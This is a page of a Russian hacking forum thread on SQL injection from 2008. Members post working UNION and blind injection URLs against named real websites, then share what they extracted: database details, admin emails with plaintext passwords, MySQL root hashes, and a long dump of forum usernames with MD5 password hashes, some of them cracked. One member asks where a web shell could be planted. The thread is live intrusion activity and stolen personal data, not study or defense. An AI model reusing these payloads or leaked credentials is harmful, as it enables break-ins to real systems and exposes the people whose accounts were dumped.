ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 607 из 1242 « Первая < 107507557597 603 604 605 606 607 608 609 610 611 6176577071107 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #6061  
Старый 22.07.2008, 22:50
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию
Blind:
http://buymebel.ru/index.php?pl=price&id=18+1,2,3,4,5,6,7--
http://buymebel.ru/index.php?pl=price&id=18+AND+ascii(lower(substring (version(),1,1)))=53--
Version: 5.*.*
имя юзера длинной 24 символа. руками подбирать лень >_<
________________________________
http://stroy-grup.ru/index.php?lang_id=1&menu_id=79+AND+ascii(lower(sub string(version(),1,1)))=52--
Version: 4.*.*
________________________________
http://stove.ru/index.php?lng=&rs=116+AND+ascii(lower(substring(ve rsion(),1,1)))=53--
Version: 5.*.*
Последний раз редактировалось Calcutta; 22.07.2008 в 23:10..
 
Ответить с цитированием

  #6062  
Старый 22.07.2008, 23:10
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
2 Calcutta
http://www.zavodmonolit.ru/photos/index.php?id_group=-111+UNION+SELECT+1,CONCAT_WS(0x3a,version(),user() ,database())--

Database Version: 5.0.51a-community-nt
Database name: zavodmonolit
User name: zavodmonolit@localhost

http://www.zavodmonolit.ru/photos/index.php?id_group=-111+UNION+SELECT+1,CONCAT_WS(0x3a,user_pass)+FROM+ monolit_users_table+LIMIT+0,1--

http://www.zavodmonolit.ru/admin/login_panel.php adminka

http://www.buymebel.ru/index.php?pl=price&id=18+UNION+SELECT+1,2,3,4,CONC AT_WS(0x3a,version(),user(),database()),6,7+LIMIT+ 1,1--

Database Version: 5.0.51a-log
Database name: buymebel_mebel
User name: buymebel_mebel@localhost


смотри получше это не слепая скуля..только в БД нет ничего интересного

http://www.stroy-grup.ru/index.php?lang_id=1&menu_id=79

Database Version: 4.0.27-log
User name: stroygr2_stroygr@localhost
Database name: stroygr2_stroygrup


http://stove.ru/index.php?lng=&rs=116+UNION+SELECT+CONCAT_WS(0x3a, version(),user(),database()),2,3,4,5,6+LIMIT+1,1/*

Database Version: 5.0.41-log
Database name: stove
User name: stove@jet.mplik.ru

скуля тоже не слепая, так что мудрить с подзапросами не обязательно.Но похвально.Респект тебе чувак . но в БД опять таки ничего интересного нет..или может я ошибаюсь так как сильно не ковырял..

http://hydrosystems.ro/news.php?id=17+UNION+SELECT+1,AES_DECRYPT(AES_ENCR YPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x 71),0x71),3,4,5,6,7/*

Database Version: 4.1.10a-Max
Database name: usr_web16_1
User name: web16@localhost

Дальше к сожалению не получилось подобрать табелки... кто сможет от меня респект

http://gardenia-antana.com/front/content.php?pr_id=-3+UNION+SELECT+1,CONCAT_WS(0x3a,user(),version(),d atabase()),3,4--

Database Version: 4.1.22-log
Database name: gardenia
User name: gardant@localhost

http://www.news.rallybulgaria.com/news_detail_bg.php?r5=_5&idd=0000000166+UNION+SELE CT+1,2,3,4,CONCAT_WS(0x3a,version(),user(),databas e()),6,7,8,9,10+LIMIT+1,1


Database Version: 4.1.22-log
Database name: rallyreplay
User name: rallybulgariacom@localhost

http://www.news.rallybulgaria.com/news_detail_bg.php?r5=_5&idd=0000000166+UNION+SELE CT+1,2,3,4,CONCAT_WS(0x3a,id,mail,name,password),6 ,7,8,9,10+FROM+admins+LIMIT+1,1

0001:the@red.com:ivan:1
0002:redivan@gmail.com:Ivan:red
0003:geshev@rallybulgaria.com:Iasen:123456!


админку не искал...

http://www.gfialomita.ro/detal_presa.php?id=-62'+UNION+SELECT+1,CONCAT_WS(0x3a,user(),version() ,database()),3,4,5/*

Database Version: 4.1.21-log
Database name: gfialomita
User name: root@localhost


http://www.gfialomita.ro/detal_presa.php?id=-62'+UNION+SELECT+1,CONCAT_WS(0x3a,password,user),3 ,4,5+FROM+mysql.user+LIMIT+0,1/*

[0]:7864ed0a46b1e475:root
[1]::root
[2]::
[3]::
[4]::root
[5]:*9CC04D6E974DFC9548D014670AF51FD1856CA3B9:root
[6]::root
[7]::root
[8]::root
[9]:*553DE232FFDE86F5BA68A54C95F97D86569AB6E4:vpopmai luser
[10]::root
[11]::root
[12]:*00A51F3F48415C7D4E8908980D443C29C69B60C9:roundcu be
[13]:*9CC04D6E974DFC9548D014670AF51FD1856CA3B9:root
[14]:*4B9AEA4AAD6DD8F147DDDFECF02E0A8991FC4B8B:spamuse r
[15]:*9CC04D6E974DFC9548D014670AF51FD1856CA3B9:root

Ребят, раскручивайте скули перед тем как сюда постить

всем спасибо
Последний раз редактировалось Gorev; 23.07.2008 в 00:14..
 
Ответить с цитированием

  #6063  
Старый 22.07.2008, 23:17
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию
Цитата:
Сообщение от Gorev  
2 Calcutta
смотри получше это не слепая скуля..только в БД нет ничего интересного

всем спасибо
во, точно, не подставил куда надо -)
время уже завно за полночь перевалило, мало что соображаю уже -)
лови "+"
 
Ответить с цитированием

  #6064  
Старый 22.07.2008, 23:55
Аватар для Cmucl
Cmucl
Новичок
Регистрация: 21.06.2008
Сообщений: 17
Провел на форуме:
153953

Репутация: 18
По умолчанию
Цитата:
Сообщение от Calcutta  
http://www.zavodmonolit.ru/photos/index.php?id_group=-111/**/union/**/select/**/1,concat_ws(0x3a,table_name)+from+information_sche ma.tables+limit+22,1--
на ваш страх и риск -)
раскрутить не вышло или я что-то не так делаю Х_х

Подобрал пасс - zspJDYbBuwODc
Юзера не получиется(

//опередили =\
 
Ответить с цитированием

  #6065  
Старый 23.07.2008, 00:12
Аватар для SNIFF
SNIFF
junior admin
Регистрация: 15.11.2004
Сообщений: 105
Провел на форуме:
623414

Репутация: 12
По умолчанию
http://www.line6.ru/info.php?id=-4077'+union+select+1,2,3,concat_ws(0x3a,username,u %20ser_password,user_email),5,6,7,8,9+from+phpbb_u ser%20s/*
 
Ответить с цитированием

  #6066  
Старый 23.07.2008, 00:37
Аватар для DDoSька
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию
Цитата:
Сообщение от Cmucl  
Подобрал пасс - zspJDYbBuwODc
Юзера не получиется(

//опередили =\
Это ведь хэш,его еще разшифроваь надо
 
Ответить с цитированием

  #6067  
Старый 23.07.2008, 02:30
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию
сурс: http://www.pingpong.su/

5 мускул. Куча таблиц, несколько БД. Где-то среди многочисленных *adm_users* прячется истинный hash на http://www.pingpong.su/admin

Было лень копаться, сделал по phpbb:
http://www.pingpong.su/show_katalog.php?comp_id=-1+union+select+concat(username,0x3a,user_password) +from+phpbb_pingpong_users+limit+1,10/*&action=new

Login: kungpo
password: 59be2a162270a11b949010306c78754f удачно подбрутился: alex5

Пасс админа форума.
 
Ответить с цитированием

  #6068  
Старый 23.07.2008, 02:33
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию
Если можно, гуру - гляньте, может шелл где присадить можно ? thx
 
Ответить с цитированием

  #6069  
Старый 23.07.2008, 03:08
Аватар для t0ox
t0ox
Новичок
Регистрация: 23.10.2007
Сообщений: 17
Провел на форуме:
105851

Репутация: 46
По умолчанию
Код:
http://metromir.ru/new_countries.php?id=-7%20union%20select%201,group_concat(table_name,0x3c62723e),3,4,5%20from%20information_schema.tables/*
Код:
http://promtractor.ru.titan.mtw.ru/eng/show_page.php?section=13&id=-5%20union%20select%201,2,3,4,5,6,7,8,9/*
 
Ответить с цитированием

Касперкой
  #6070  
Старый 23.07.2008, 04:20
Аватар для Cmucl
Cmucl
Новичок
Регистрация: 21.06.2008
Сообщений: 17
Провел на форуме:
153953

Репутация: 18
По умолчанию Касперкой
Цитата:
Сообщение от Mo4x  
kaspersky.fr


Version:5.0.38
User:adminsql@localhost

Помогите раскрутить инъекцию

Форум bb
[2]:admin:4d91567da38be2f1a4058f68e166224e - AMAP
[3]:Gadoux:bf64e931253d69d576b4347ab3d7b7cd
[4]:Johann:fa4e3b741f66e7d4301ddfa7fcecdb18
[5]:Test:098f6bcd4621d373cade4e832627b4f6
[6]:slb:ca50c20f09c7f71a23ebc686c4dcd5fa
[7]:M.Koletzki:d121ef4c27f2bf3510a6a5442ae837f0
[8]:test2:ad0234829205b9033196ba818f7a872b
[9]:nfournier:8eca54c4efaa8603cd3dd729dfa71f2d
[10]:kwchin:554d267fa4ce4351e1c9d89eea37b542
[11]:Franklin:e9646d086a37906e5bec4323d3b37c9b
[12]:Francesco:47000c3c0efa1ef622ac7dbc757fb4c9
[13]:Paul.Gaurd:34b7df049a96890ffcd4bfed6ce21cda
[14]:Fred:e10adc3949ba59abbe56e057f20f883e
[15]:Antony Lai:3716114b005e9b4e533c7f3cd0f4f253
[16]:Marcus:d836f1b5392cf4935752a8745dae1f21
[17]:Achim Flum:15dcad2a4a8242b1e22ab4d80c25ba67
[18]:Michaлl:b991ab37857382709f0ce0cc9e983a59
[19]aisuke Gonoi:1c6c80033f18d5af7279ee919b311800
[20]:Kumara:399f1109d5cbb6c918fc08776e1e9331
[21]:engels:42c30e6f00ca3cf18efe60b443692283
[22]:Jim_Lo:ccade42cdcd2f7a4e3b3e0426ad9fccd
[23]:charles79:e5a7f392d933b5bb4830fc6b50e4550e
[24]:MEKKI Mohamed:8f5c853566391602f1a56b305e1d9cd5
[25]livier.ako:cfc5adef048746dac83216290dcead5b
[26]:Manfred Hцller:8835b2fbc17349197534c5b78422eb93
[27]:tommychan:17510b05d6334018482e48a458264496
[28]:Nelson:2cb503f370d8c21bab19f472ab4f2dfb
[29]:Albert Lim:9c80993e1e086536e6781baa01f22886
[30]:Emily Su:ac0dd849f94cf31ffd487601cfaa4a41
[31]:Penguin.Zhou:8de531e942e4a5f2df9c57f563953886
[32]:Ajax Chen:aa0ade65f4f6e71ae9894ed98cf26cff
[33]:marc.niederhauser:e86a82e06073ff66d45fd33575c6bf6 2
[34]ennis Cho:2f76b398b509709779be8d9fa6bed403
[35]:Jose:350c9d901b7f1c73a481e240ec1b7c0b
[36]:sunny kim:7789f886eeea608c3bf406d1fd656489
[37]:campus_ne:6f2383a03bf27c6109e17c8e2ce48620
[38]:Bellevue:071931c0f79e043e513ce177d255d586
[39]:informatica.madrid:418a49d085d933aef5aa265a82705b d5
[40]:Federico:8f0a20e111a2823f837dd39886fddcb6
[41]:Helge:65ce068e5c9ae2c24b29d470994fe0f9
[42]:Oleg Omelchenko:ebb5041a45ec6db62eb99efc9c8c0b6c
[43]appacel:071931c0f79e043e513ce177d255d586
[44]ensom:fc58b89d7df2a019b6954ef0442efb3f
[45]:imran.faki:273abe22e7ba2307abd83aa4df6e0c1c
[46]:marionshaw:c3dc3962352a2be494bc56c7b7303fa9
[47]:xdeniau:4bdd9eb5c71b2549e03b0e2bf708940e
[48]:mbashar:a51df5ac1124c9ad99cf6c204ea53dec
[49]:coltmer:89244e0f5a920d56d08c82c68b99e876
[50]:JFiliano:f631417f13b0d675a4423863406151fd
[51]:faegerter:d3077f398a81cc537dcac6b4fb2eb9e8
[52]iaget:1ef12de62937b222cd8a6d321b005245
[53]:Jonathan Leung:ef0cc10ff462af3af3e15f592c4ec8da
[54]:teresa.reid@richemont.com:0259580a1fb2541516a4ba1 6d6f310b3
[55]:matthew monkman:981f12cf3c50cff778d775da904efc2e
[56]:FSA:ac4460f8530e3a4e4e21558badb72a1b
[57]:Laurent.Marguier:655b8d280cd0d52b1e37a4dadb43f9a3
[58]:Chas.lankford:2ce4cf1a4e0776a9c23ddc8fb1087fdc
[59]:michvd:b1b5c11f85ad3b140db3278d580e78dd
[60]:Guillermo Romera:201976bb86f0ca41de07c13243769da0
[61]:Alexei:35cffef36aabe77ecaccefa53a4f5317
[62]:Phil Fei:9479cdbeecb0c3dd1b0a97b7e383e990
[63]badmin:1acf49879500f7a583fc20d2a505c527
[64]:tvos:a01183854d7e784f0455d559f4327d55
[65]:raul.contreras:4c84b0babfd962ec7c6823bd7e9f79bc
[66]:supmei:bf12d41d78a93a7ee50292a25596e4f0
[67]:nicolas.dain:d04f754b95d0615bf285ceae2a476abd
[68]:rcarrer:9a1364050d93fad0642cf2dd46964995
[69]:echrapow:b059c410930aa4f8490259138fc81585
[70]:Yvonne Spruce:9f05aa4202e4ce8d6a72511dc735cce9
[71]:Philippe:d33dc5628def5da84e361f6b889a4ed8
[72]:cshelp@dunhill.com:0e06e290f09e2ed40e482d8b389858 b1
[73]:seamus:aca7ab7d3c004cf4b119cb50e4e17fa7
[74]:florent.pt:67fff3535d17fd2c87b5a4231b5319c9
[75]:MICHEL:5acb5db1d21e997807ed9b02ba32ed34
[76]:hugo.marinho:09b7a8ed41bca894367b6c7881fe7a1c
[77]:mario.leonlaurent:de56c2c4bc0554a08a2e3bf12d358c1 8
[78]:jerome:c6fe7bebba8cc6a2492212adfa89bbd5
[79]:trevor:1cdd28cbda9775ee3746dae8acbd5747
[80]:Admin.Rodriguez:8b24894ba5c97046af2ab72545490fe0
[81]:amireche:5c13f1139c6bcc60756cb8032fd5d3ee
[82]:johann.collot:b8c584820a74d91c41ec856c41562078
================================================== ======
Стало быть админка =\ Поиском не занимался

[1]:9dd3ba637ec2fcaf383415617d39e002:System Administrator - пасс - 180872

==========================================
http://uinc.ru/news/sn10459.html - присоеденимся?)
=========================
[Смысл]
Последний раз редактировалось Cmucl; 23.07.2008 в 05:50..
 
Ответить с цитированием
Ответ
Страница 607 из 1242 « Первая < 107507557597 603 604 605 606 607 608 609 610 611 6176577071107 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ